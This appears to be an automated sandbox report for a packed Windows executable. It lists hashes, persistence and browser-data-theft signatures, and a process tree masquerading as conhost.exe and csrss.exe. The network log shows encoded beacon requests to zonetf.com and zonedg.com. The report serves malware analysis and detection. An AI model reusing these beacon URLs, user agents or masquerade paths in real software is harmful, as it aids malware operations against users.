Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    142s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    30/12/2023, 01:58 UTC

General

  • Target

    0ae3c3d40e9e2f9a607eb122945fd806.exe

  • Size

    177KB

  • MD5

    0ae3c3d40e9e2f9a607eb122945fd806

  • SHA1

    44144fd58f1402d7e9fb9f79d8b1db8e47eb9ca0

  • SHA256

    7df7cc25adec4db367b0ac4e3428672d773820a9f4fdfbf0346cd2e31225c59c

  • SHA512

    cf28b7a0ebb6d3abae6ab213bc8ea492d3d799d9d23439f13ba9b9df64f28e24f60be3fc5047fda608780555aea9135708c532214b8aa39bf3783709934e041f

  • SSDEEP

    3072:jAtbd/WSkwyW62FL0/qtCnkvTnlMMF1SJhinKxP6bqbrqjMVdTdws0lft2zn+lz5:0D/2ZrnGnpLnKx1brqjeRxEPlzGG

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe
    "C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe
      C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft
      2⤵
        PID:804
      • C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe
        C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp
        2⤵
          PID:2188

      Network

      • flag-us
        DNS
        blenderartists.org
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        8.8.8.8:53
        Request
        blenderartists.org
        IN A
        Response
        blenderartists.org
        IN A
        104.21.49.24
        blenderartists.org
        IN A
        172.67.188.202
      • flag-us
        GET
        http://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        104.21.49.24:80
        Request
        GET /external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd HTTP/1.0
        Connection: close
        Host: blenderartists.org
        Accept: */*
        User-Agent: iamx/3.11
        Response
        HTTP/1.1 301 Moved Permanently
        Date: Sat, 30 Dec 2023 15:06:48 GMT
        Connection: close
        Cache-Control: max-age=3600
        Expires: Sat, 30 Dec 2023 16:06:48 GMT
        Location: https://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I2Bmo4viQMV%2F0oN7ImkPqE2Z4iNOZ64euHvXx%2BJh9p2Jow%2FFK1NZRYXTQMhRu%2FycSMtDKO8WyLAEbFOxVY0seKMUzRbypib1BhjPr5Lnp02AK1Hgj9xXae%2BatLQu0htCMDaaZFs%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 83db3052fa337725-LHR
        alt-svc: h3=":443"; ma=86400
      • flag-us
        DNS
        zonetf.com
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        8.8.8.8:53
        Request
        zonetf.com
        IN A
        Response
        zonetf.com
        IN A
        212.32.237.92
      • flag-nl
        POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:06:37 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=0737a038-a725-11ee-b50a-ae3f094d6636; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:20:44 GMT; max-age=2147483647; HttpOnly
      • flag-nl
        POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:06:46 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=0d31d49d-a725-11ee-8f28-ae3f97f7d132; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:20:54 GMT; max-age=2147483647; HttpOnly
      • flag-nl
        POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:06:49 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=0e680353-a725-11ee-a4da-ae3f87cde345; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:20:56 GMT; max-age=2147483647; HttpOnly
      • flag-us
        DNS
        zonedg.com
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        8.8.8.8:53
        Request
        zonedg.com
        IN A
        Response
        zonedg.com
        IN A
        206.238.216.8
      • flag-us
        DNS
        zonedg.com
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        8.8.8.8:53
        Request
        zonedg.com
        IN A
      • flag-sg
        GET
        http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        206.238.216.8:80
        Request
        GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg HTTP/1.0
        Connection: close
        Host: zonedg.com
        Accept: */*
        User-Agent: iamx/3.11
        Response
        HTTP/1.1 301 Moved Permanently
        Content-Length: 0
        Server: nginx
        Location: http://www.zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg
        Content-Type: text/html
      • flag-nl
        POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:06:54 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=11831a6d-a725-11ee-bb58-ae3f07fba5f8; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:21:01 GMT; max-age=2147483647; HttpOnly
      • flag-nl
        POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:07:00 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=150f2a65-a725-11ee-b34c-ae3fea10aeff; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:21:07 GMT; max-age=2147483647; HttpOnly
      • flag-sg
        GET
        http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        206.238.216.8:80
        Request
        GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg HTTP/1.0
        Connection: close
        Host: zonedg.com
        Accept: */*
        User-Agent: iamx/3.11
        Response
        HTTP/1.1 301 Moved Permanently
        Content-Length: 0
        Server: nginx
        Location: http://www.zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg
        Content-Type: text/html
      • flag-nl
        POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:07:04 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=17ed9179-a725-11ee-8383-ae3f998aec03; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:21:12 GMT; max-age=2147483647; HttpOnly
      • flag-nl
        POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:07:04 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=17ee8098-a725-11ee-9f71-ae3fe9ca28d4; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:21:12 GMT; max-age=2147483647; HttpOnly
      • 104.21.49.24:80
        http://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        1.9kB
        1.5kB
        9
        5

        HTTP Request

        GET http://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd

        HTTP Response

        301
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        912 B
        567 B
        6
        5

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G

        HTTP Response

        302
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        1.4kB
        527 B
        8
        4

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

        HTTP Response

        302
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        631 B
        527 B
        6
        4

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

        HTTP Response

        302
      • 206.238.216.8:80
        http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        961 B
        670 B
        10
        6

        HTTP Request

        GET http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg

        HTTP Response

        301
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        613 B
        567 B
        6
        5

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

        HTTP Response

        302
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        679 B
        567 B
        7
        5

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D

        HTTP Response

        302
      • 206.238.216.8:80
        http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        541 B
        455 B
        8
        6

        HTTP Request

        GET http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg

        HTTP Response

        301
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        653 B
        970 B
        7
        6

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

        HTTP Response

        302
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
        http
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        671 B
        970 B
        7
        6

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D

        HTTP Response

        302
      • 8.8.8.8:53
        blenderartists.org
        dns
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        64 B
        96 B
        1
        1

        DNS Request

        blenderartists.org

        DNS Response

        104.21.49.24
        172.67.188.202

      • 8.8.8.8:53
        zonetf.com
        dns
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        56 B
        72 B
        1
        1

        DNS Request

        zonetf.com

        DNS Response

        212.32.237.92

      • 8.8.8.8:53
        zonedg.com
        dns
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        112 B
        72 B
        2
        1

        DNS Request

        zonedg.com

        DNS Request

        zonedg.com

        DNS Response

        206.238.216.8

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

